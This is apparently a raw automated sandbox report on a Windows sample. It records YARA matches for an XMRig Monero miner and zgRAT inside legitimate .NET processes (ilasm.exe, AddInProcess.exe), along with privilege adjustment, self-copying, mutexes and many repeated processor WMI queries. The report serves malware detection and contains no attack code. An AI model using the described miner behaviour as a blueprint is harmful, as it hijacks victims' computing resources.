Source: 6.2.ilasm.exe.203917796c8.3.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 6.2.ilasm.exe.203917796c8.3.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 6.2.ilasm.exe.203917796c8.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 10.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 10.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 10.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 0000000A.00000002.1474573291.0000000140465000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000006.00000002.3764979928.0000020391475000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000006.00000002.3913939775.00000203FCE70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000006.00000002.3764979928.0000020391BDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000006.00000002.3764979928.0000020390F4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: ilasm.exe PID: 7180, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: AddInProcess.exe PID: 7476, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: classification engine Classification label: mal100.troj.evad.mine.winEXE@23/12@2/1
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Code function: 0_2_00007FF68BBF4B00 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma, 0_2_00007FF68BBF4B00
Source: C:\Users\user\KPn7VgIWQj.exe Code function: 8_2_00007FF72A664B00 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma, 8_2_00007FF72A664B00
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe File created: C:\Users\user\KPn7VgIWQj.exe Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5444:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Mutant created: \Sessions\1\BaseNamedObjects\a545686b9d34f99fb8604014a3d1b126
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Mutant created: \Sessions\1\BaseNamedObjects\444118017aca01d9d0dde7
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1792:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ujxqrkz4.5p3.ps1 Jump to behavior
Source: C:\Users\user\KPn7VgIWQj.exe Process created: C:\Windows\explorer.exe
Source: C:\Users\user\KPn7VgIWQj.exe Process created: C:\Windows\explorer.exe Jump to behavior
Source: KPn7VgIWQj.exe Static file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
